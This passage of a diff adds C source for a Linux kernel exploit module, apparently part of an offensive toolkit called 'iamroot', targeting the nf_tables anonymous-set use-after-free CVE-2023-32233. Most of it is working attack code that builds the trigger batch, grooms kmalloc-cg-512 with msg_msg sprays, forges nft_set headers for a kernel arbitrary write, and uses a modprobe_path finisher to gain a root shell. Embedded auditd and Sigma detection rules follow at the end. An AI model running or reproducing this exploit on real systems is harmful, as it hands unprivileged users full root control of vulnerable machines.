*nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + put_batch_marker(buf, off, NFNL_MSG_BATCH_BEGIN, seq); +} + +static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + put_batch_marker(buf, off, NFNL_MSG_BATCH_END, seq); +} + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + end_msg(buf, off, at); +} + +/* NFT_MSG_NEWSET: anonymous, with NFT_SET_EVAL so the lookup-rule + * codepath kicks the commit-phase deactivation we want to corrupt. */ +static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWSET, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + put_attr_u32(buf, off, NFTA_SET_FLAGS, + NFT_SET_ANONYMOUS | NFT_SET_CONSTANT | NFT_SET_EVAL); + put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0); /* "integer" */ + put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t)); + put_attr_u32(buf, off, NFTA_SET_ID, IAMROOT_SET_ID); + end_msg(buf, off, at); +} + +/* NFT_MSG_NEWRULE: a single nft_lookup expression that references the + * anonymous set. The expression list contains one NFTA_LIST_ELEM whose + * NFTA_EXPR_NAME = "lookup" and NFTA_EXPR_DATA.{ NFTA_LOOKUP_SREG=1, + * NFTA_LOOKUP_SET_ID=IAMROOT_SET_ID }. + */ +static void put_new_rule_with_lookup(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWRULE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + + size_t exprs_at = begin_nest(buf, off, NFTA_RULE_EXPRESSIONS); + /* one expression: lookup */ + size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "lookup"); + size_t edata_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* lookup expr attrs: source register, target set (by ID), no flags */ + put_attr_u32(buf, off, NFTA_LOOKUP_SREG, 1 /* NFT_REG_1 */); + put_attr_str(buf, off, NFTA_LOOKUP_SET, NFT_SET_NAME); + put_attr_u32(buf, off, NFTA_LOOKUP_SET_ID, IAMROOT_SET_ID); + end_nest(buf, off, edata_at); + end_nest(buf, off, el_at); + end_nest(buf, off, exprs_at); + + /* tag the rule with userdata so DELRULE-by-userdata works later */ + put_attr(buf, off, NFTA_RULE_USERDATA, NFT_RULE_HANDLE_ATTR, + sizeof(NFT_RULE_HANDLE_ATTR)); + end_msg(buf, off, at); +} + +/* NFT_MSG_DELSET against the anonymous set (by name in our private + * netns, which is unique to this transaction). On a vulnerable kernel, + * this is what fails to deactivate the lookup expression's reference. */ +static void put_del_set(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_DELSET, + NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME); + end_msg(buf, off, at); +} + +/* NFT_MSG_DELRULE: identify by chain + first rule. The classic public + * PoC uses DELRULE-by-chain (no handle attr) which deletes all rules + * in the chain — fine, our chain only has one. */ +static void put_del_rule(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_DELRULE, + NLM_F_ACK, seq, NFPROTO_INET); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * netlink send helper + * ------------------------------------------------------------------ */ + +static int nft_send_batch(int sock, const void *buf, size_t len) +{ + struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = (void *)buf, .iov_len = len }; + struct msghdr m = { + .msg_name = &dst, .msg_namelen = sizeof dst, + .msg_iov = &iov, .msg_iovlen = 1, + }; + ssize_t n = sendmsg(sock, &m, 0); + if (n < 0) { perror("[-] sendmsg"); return -1; } + + /* Drain ACKs/errors for diagnostics. Failures are expected on + * the malformed shape; the side effect already landed. */ + char rbuf[8192]; + for (int i = 0; i < 16; i++) { + ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT); + if (r <= 0) break; + for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf; + NLMSG_OK(nh, (unsigned)r); + nh = NLMSG_NEXT(nh, r)) { + if (nh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh); + if (e->error) + fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n", + nh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + } + return 0; +} + +/* ------------------------------------------------------------------ + * msg_msg cross-cache groom — kmalloc-cg-512 + * + * The freed nft_set object lives in kmalloc-cg-512 on lts-6.1.x and + * 6.2.x builds (nft_set is ~448 bytes incl. ops vtable pointer + + * pcpu data, rounds to cg-512). We spray 32 queues × 16 messages + * tagged with the "IAMROOT_SET" prefix so KASAN/triage can correlate. + * ------------------------------------------------------------------ */ + +#define SPRAY_QUEUES 32 +#define SPRAY_MSGS_PER_QUEUE 16 +#define MSG_PAYLOAD_BYTES 496 /* 512 - sizeof(msg_msg hdr ~= 16) */ +#define IAMROOT_TAG "IAMROOT_SET" + +struct ipc_payload { + long mtype; + unsigned char buf[MSG_PAYLOAD_BYTES]; +}; + +static int spray_msg_msg(int queues[SPRAY_QUEUES]) +{ + struct ipc_payload p; + memset(&p, 0, sizeof p); + p.mtype = 0x53; /* 'S' for "set" */ + memset(p.buf, 0x53, sizeof p.buf); + /* recognizable cookie at the head of every message */ + memcpy(p.buf, IAMROOT_TAG, sizeof IAMROOT_TAG - 1); + + int created = 0; + for (int i = 0; i < SPRAY_QUEUES; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_msg_msg(int queues[SPRAY_QUEUES]) +{ + for (int i = 0; i < SPRAY_QUEUES; i++) { + if (queues[i] >= 0) { + msgctl(queues[i], IPC_RMID, NULL); + } + } +} + +/* ------------------------------------------------------------------ + * Slabinfo snapshot — best-effort diagnostic showing the UAF fired. + * ------------------------------------------------------------------ */ + +static long slabinfo_active(const char *slab) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, slab, strlen(slab)) == 0 && + line[strlen(slab)] == ' ') { + long a, b, c, d; + if (sscanf(line + strlen(slab), " %ld %ld %ld %ld", + &a, &b, &c, &d) >= 1) { + active = a; + } + break; + } + } + fclose(f); + return active; +} + +/* ------------------------------------------------------------------ + * Build trigger batch — factored so --full-chain can re-fire. + * ------------------------------------------------------------------ */ + +static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq) +{ + (void)cap; + size_t off = 0; + put_batch_begin(batch, &off, (*seq)++); + put_new_table(batch, &off, (*seq)++); + put_new_chain(batch, &off, (*seq)++); + put_new_set(batch, &off, (*seq)++); + put_new_rule_with_lookup(batch, &off, (*seq)++); + put_del_set(batch, &off, (*seq)++); + put_del_rule(batch, &off, (*seq)++); + put_batch_end(batch, &off, (*seq)++); + return off; +} + +/* ------------------------------------------------------------------ + * Breadcrumb log + * ------------------------------------------------------------------ */ + +static void log_breadcrumb(long before, long after, int sprayed) +{ + FILE *f = fopen("/tmp/iamroot-nft_set_uaf.log", "a"); + if (!f) return; + time_t now = time(NULL); + char ts[64]; + strftime(ts, sizeof ts, "%Y-%m-%dT%H:%M:%SZ", gmtime(&now)); + fprintf(f, "%s nft_set_uaf primitive fired: cg512 active %ld→%ld; " + "msg_msg sprayed=%d tag=%s\n", + ts, before, after, sprayed, IAMROOT_TAG); + fclose(f); +} + +/* ------------------------------------------------------------------ + * --full-chain: per-build forged-set-object arb-write context. + * + * Technique: after the trigger frees the anonymous nft_set into + * kmalloc-cg-512, we spray msg_msg payloads sized to claim the freed + * slot. We forge the first qwords as an nft_set header where the + * `set->data` pointer is the target kaddr. A subsequent + * NFT_MSG_NEWSETELEM commit copies our element data through + * `set->data` → write at kaddr. + * + * Caveats (per "verified-vs-claimed"): + * - exact offset of `data` inside nft_set is config-sensitive + * (RANDSTRUCT / KASAN / lockdep shift it) + * - the freed slot must be claimed by our spray, not by an + * unrelated kernel allocator — race-dependent + * - the finisher's sentinel post-check is the source of truth; + * missed writes return IAMROOT_EXPLOIT_FAIL, not fake success + * ------------------------------------------------------------------ */ + +/* Offset of `data` pointer in nft_set header on lts-6.1.x/6.2.x builds + * (Sondej/Krysiuk PoC reference layout). Best-effort default. */ +#define NFT_SET_DATA_PTR_OFFSET 0x30 + +struct nft_arb_ctx { + int sock; + uint8_t *batch; + int qids[SPRAY_QUEUES]; + int qused; +}; + +static int spray_forged_set_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n) +{ + if (c->qused >= SPRAY_QUEUES) return 0; + int room = SPRAY_QUEUES - c->qused; + if (n > room) n = room; + + for (int i = 0; i < n; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (q < 0) { perror("[-] msgget(forged)"); return -1; } + c->qids[c->qused++] = q; + + struct ipc_payload m; + memset(&m, 0, sizeof m); + m.mtype = 0x5345544146; /* "FATESF" reversed tag */ + memcpy(m.buf, IAMROOT_TAG "_FORGE", sizeof IAMROOT_TAG + 5); + + /* Forge `set->data = kaddr` at the documented offset. msg_msg + * eats ~0x30 bytes at the head as its own header; the payload + * we control starts at offset 0x30 inside the slab chunk. + * We place the forged pointer at offset NFT_SET_DATA_PTR_OFFSET + * inside our payload. */ + if (NFT_SET_DATA_PTR_OFFSET + sizeof(uintptr_t) <= sizeof m.buf) { + uintptr_t *slot = (uintptr_t *)(m.buf + NFT_SET_DATA_PTR_OFFSET); + *slot = (uintptr_t)kaddr; + } + + if (msgsnd(q, &m, sizeof m.buf, 0) < 0) { + perror("[-] msgsnd(forged)"); return -1; + } + } + return 0; +} + +/* Module-specific arb-write — see finisher.h contract. */ +static int nft_set_uaf_arb_write(uintptr_t kaddr, const void *buf, size_t len, + void *vctx) +{ + struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx; + if (!c || c->sock < 0 || !c->batch) { + fprintf(stderr, "[-] nft_set_uaf_arb_write: invalid ctx\n"); + return -1; + } + if (len > 64) { + fprintf(stderr, "[-] nft_set_uaf_arb_write: len %zu too large (cap 64)\n", len); + return -1; + } + + fprintf(stderr, "[*] nft_set_uaf_arb_write: refire trigger → spray forged " + "nft_set hdrs (kaddr=0x%lx, %zu bytes)\n", + (unsigned long)kaddr, len); + + /* (a) refire the trigger for a fresh UAF window. */ + uint32_t seq = (uint32_t)time(NULL) ^ 0xc0debabeu; + size_t blen = build_trigger_batch(c->batch, 16 * 1024, &seq); + if (nft_send_batch(c->sock, c->batch, blen) < 0) { + fprintf(stderr, "[-] nft_set_uaf_arb_write: refire send failed\n"); + return -1; + } + + /* (b) spray forged set headers into kmalloc-cg-512. */ + if (spray_forged_set_msgs(c, kaddr, 16) < 0) { + fprintf(stderr, "[-] nft_set_uaf_arb_write: forged spray failed\n"); + return -1; + } + + /* (c) drive a NEWSETELEM commit carrying `buf` so the kernel's + * set->data copy lands at kaddr. We hand-roll a separate batch so + * we can carry NFTA_DATA_VALUE = buf in the element data. */ + seq = (uint32_t)time(NULL) ^ 0xdeadc0deu; + size_t off = 0; + put_batch_begin(c->batch, &off, seq++); + + size_t msg_at = off; + put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET); + put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME); + put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME); + size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + size_t el_at = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */); + + /* key: arbitrary 4-byte value (set was created with key_len=4) */ + size_t key_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY); + uint32_t kv = htonl(0x41414141); + put_attr(c->batch, &off, NFTA_DATA_VALUE, &kv, sizeof kv); + end_nest(c->batch, &off, key_at); + + /* data: NFTA_DATA_VALUE = buf */ + size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA); + put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len); + end_nest(c->batch, &off, data_at); + + end_nest(c->batch, &off, el_at); + end_nest(c->batch, &off, list_at); + end_msg(c->batch, &off, msg_at); + + put_batch_end(c->batch, &off, seq++); + + if (nft_send_batch(c->sock, c->batch, off) < 0) { + fprintf(stderr, "[-] nft_set_uaf_arb_write: write batch send failed\n"); + return -1; + } + + usleep(25 * 1000); + return 0; +} +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Exploit body + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_set_uaf_exploit(const struct iamroot_ctx *ctx) +{ + if (!ctx->authorized) { + fprintf(stderr, "[-] nft_set_uaf: refusing without --i-know gate\n"); + return IAMROOT_EXPLOIT_FAIL; + } + if (geteuid() == 0) { + if (!ctx->json) + fprintf(stderr, "[i] nft_set_uaf: already running as root\n"); + return IAMROOT_OK; + } + + /* Re-confirm vulnerability. */ + iamroot_result_t pre = nft_set_uaf_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] nft_set_uaf: detect() says not vulnerable; refusing\n"); + return pre; + } + +#ifndef __linux__ + (void)ctx; + fprintf(stderr, "[-] nft_set_uaf: non-Linux host — exploit unavailable\n"); + return IAMROOT_PRECOND_FAIL; +#else + if (!ctx->json) { + if (ctx->full_chain) { + fprintf(stderr, "[*] nft_set_uaf: --full-chain — trigger + forged " + "nft_set spray + modprobe_path finisher\n"); + } else { + fprintf(stderr, "[*] nft_set_uaf: primitive-only run — fires the\n" + " anonymous-set UAF, sprays msg_msg into\n" + " kmalloc-cg-512, and stops. Pass --full-chain\n" + " to attempt the modprobe_path root-pop.\n"); + } + } + + /* --- --full-chain path: in-process (no fork) so the finisher's + * modprobe_path trigger shares our userns+netns+sock. */ + if (ctx->full_chain) { + struct iamroot_kernel_offsets koff; + iamroot_offsets_resolve(&koff); + if (!iamroot_offsets_have_modprobe_path(&koff)) { + iamroot_finisher_print_offset_help("nft_set_uaf"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&koff); + + if (enter_unpriv_namespaces() < 0) { + fprintf(stderr, "[-] nft_set_uaf: userns entry failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { + perror("[-] socket(NETLINK_NETFILTER)"); + return IAMROOT_EXPLOIT_FAIL; + } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL; + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; } + + struct nft_arb_ctx ac = { .sock = sock, .batch = batch, .qused = 0 }; + for (int i = 0; i < SPRAY_QUEUES; i++) ac.qids[i] = -1; + + /* Initial trigger + pre-spray. */ + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_set_uaf: sending trigger batch (%zu bytes)\n", + blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_set_uaf: trigger batch failed\n"); + free(batch); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + + iamroot_result_t r = iamroot_finisher_modprobe_path(&koff, + nft_set_uaf_arb_write, &ac, !ctx->no_shell); + + /* drain whatever queues we created during arb-writes */ + drain_msg_msg(ac.qids); + free(batch); + close(sock); + return r; + } + + /* --- primitive-only path: fork-isolated trigger -------------- */ + pid_t child = fork(); + if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* --- CHILD --- */ + if (enter_unpriv_namespaces() < 0) _exit(20); + + if (!ctx->json) { + fprintf(stderr, "[*] nft_set_uaf: entered userns+netns; opening " + "nfnetlink\n"); + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); } + + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); _exit(22); + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + /* Phase 1: pre-spray msg_msg to predictabilify kmalloc-cg-512. */ + int qids[SPRAY_QUEUES]; + for (int i = 0; i < SPRAY_QUEUES; i++) qids[i] = -1; + int sprayed = spray_msg_msg(qids); + if (sprayed <= 0) { + fprintf(stderr, "[-] nft_set_uaf: pre-spray failed\n"); + close(sock); _exit(23); + } + if (!ctx->json) { + fprintf(stderr, "[*] nft_set_uaf: pre-sprayed %d msg_msg queues " + "(tag=%s)\n", sprayed, IAMROOT_TAG); + } + + /* Snapshot before. */ + long before = slabinfo_active("kmalloc-cg-512"); + if (before < 0) before = slabinfo_active("kmalloc-512"); + + /* Phase 2: build & send the full trigger batch. */ + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); drain_msg_msg(qids); _exit(24); } + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq); + if (!ctx->json) { + fprintf(stderr, "[*] nft_set_uaf: sending NEWTABLE/CHAIN/SET/RULE/" + "DELSET/DELRULE batch (%zu bytes)\n", blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_set_uaf: batch send failed\n"); + drain_msg_msg(qids); free(batch); close(sock); _exit(25); + } + + /* Give kernel time to run commit cleanup + UAF window. */ + usleep(50 * 1000); + + long after = slabinfo_active("kmalloc-cg-512"); + if (after < 0) after = slabinfo_active("kmalloc-512"); + if (!ctx->json) { + fprintf(stderr, "[i] nft_set_uaf: kmalloc-cg-512 active: %ld → %ld\n", + before, after); + } + + log_breadcrumb(before, after, sprayed); + + drain_msg_msg(qids); + free(batch); + close(sock); + + _exit(100); /* primitive-only sentinel */ + } + + /* --- PARENT --- */ + int status; + waitpid(child, &status, 0); + + if (!WIFEXITED(status)) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_set_uaf: child died by signal %d — bug " + "likely fired (KASAN/oops can manifest as child " + "signal)\n", WTERMSIG(status)); + } + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 100) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_set_uaf: trigger fired; anonymous-set\n" + " UAF induced + msg_msg spray landed in\n" + " kmalloc-cg-512. R/W chain NOT executed\n" + " (Option B scope).\n" + "[i] nft_set_uaf: see /tmp/iamroot-nft_set_uaf.log\n" + " for slab-delta breadcrumb. Pass --full-chain\n" + " to attempt modprobe_path root-pop.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + + if (rc >= 20 && rc <= 25) { + if (!ctx->json) { + fprintf(stderr, "[-] nft_set_uaf: trigger setup failed (child rc=%d)\n", + rc); + } + return IAMROOT_EXPLOIT_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[-] nft_set_uaf: unexpected child rc=%d\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; +#endif /* __linux__ */ +} + +/* ------------------------------------------------------------------ + * Cleanup — best-effort drain + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_set_uaf_cleanup(const struct iamroot_ctx *ctx) +{ + (void)ctx; + /* Best-effort breadcrumb removal. We can't drain msg queues from a + * different process (they live in a private IPC namespace anyway, + * which exited with the child). */ + if (unlink("/tmp/iamroot-nft_set_uaf.log") != 0 && errno != ENOENT) { + /* not fatal */ + } + return IAMROOT_OK; +} + +/* ------------------------------------------------------------------ + * Embedded detection rules + * ------------------------------------------------------------------ */ + +static const char nft_set_uaf_auditd[] = + "# nft_set anonymous-set UAF (CVE-2023-32233) — auditd detection rules\n" + "# Flag unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by nfnetlink\n" + "# transactions that mix NEWSET+DELSET in the same batch. Legitimate\n" + "# nft scripts rarely DELSET an anonymous set they just created;\n" + "# tune per env for firewalld/podman noise.\n" + "-a always,exit -F arch=b64 -S unshare -k iamroot-nft_set_uaf-userns\n" + "-a always,exit -F arch=b32 -S unshare -k iamroot-nft_set_uaf-userns\n" + "# Watch nfnetlink writes (the trigger batch goes via NETLINK_NETFILTER):\n" + "-a always,exit -F arch=b64 -S sendmsg -F a0!=0 -k iamroot-nft_set_uaf-nft\n" + "# msg_msg cross-cache groom: msgsnd bursts on multiple queues:\n" + "-a always,exit -F arch=b64 -S msgsnd -k iamroot-nft_set_uaf-msgsnd\n" + "# Canonical post-exploit primitives:\n" + "-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -k iamroot-nft_set_uaf-priv\n"; + +static const char nft_set_uaf_sigma[] = + "title: Possible CVE-2023-32233 nft anonymous-set UAF exploitation\n" + "id: 23233e7c-iamroot-nft-set-uaf\n" + "status: experimental\n" + "description: |\n" + " Detects the canonical exploit shape for the nf_tables anonymous-set\n" + " use-after-free (Sondej/Krysiuk, May 2023): an unprivileged process\n" + " creates a user namespace + net namespace, then issues an nfnetlink\n" + " batch that creates and deletes an anonymous set in the same\n" + " transaction, followed by a msg_msg spray (msgsnd burst).\n" + " False positives: containers (podman/docker rootless), firewalld\n" + " ruleset reloads. Combine with process-tree: a previously-unpriv\n" + " process that suddenly has effective uid 0 is the smoking gun.\n" + "logsource: {product: linux, service: auditd}\n" + "detection:\n" + " userns_clone:\n" + " type: 'SYSCALL'\n" + " syscall: 'unshare'\n" + " a0: 0x10000000\n" + " nft_writes:\n" + " type: 'SYSCALL'\n" + " syscall: 'sendmsg'\n" + " msg_spray:\n" + " type: 'SYSCALL'\n" + " syscall: 'msgsnd'\n" + " uid_change:\n" + " type: 'SYSCALL'\n" + " syscall: 'setresuid'\n" + " auid|expression: '!= 0'\n" + " condition: userns_clone and nft_writes and msg_spray\n" + "level: high\n" + "tags: [attack.privilege_escalation, attack.t1068, cve.2023.32233]\n"; + +const struct iamroot_module nft_set_uaf_module = { + .name = "nft_set_uaf", + .cve = "CVE-2023-32233", + .summary = "nf_tables anonymous-set UAF (Sondej+Krysiuk) — primitive + groom", + .family = "nf_tables", + .kernel_range = "5.1 ≤ K, fixed mainline 6.4-rc4; backports: 6.3.2 / 6.2.15 / 6.1.28 / 5.15.111 / 5.10.180 / 5.4.243 / 4.19.283", + .detect = nft_set_uaf_detect, + .exploit = nft_set_uaf_exploit, + .mitigate = NULL, /* mitigation: upgrade kernel; OR set unprivileged_userns_clone=0 */ + .cleanup = nft_set_uaf_cleanup, + .detect_auditd = nft_set_uaf_auditd, + .detect_sigma = nft_set_uaf_sigma, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_nft_set_uaf(void) +{ + iamroot_register(&nft_set_uaf_module); +}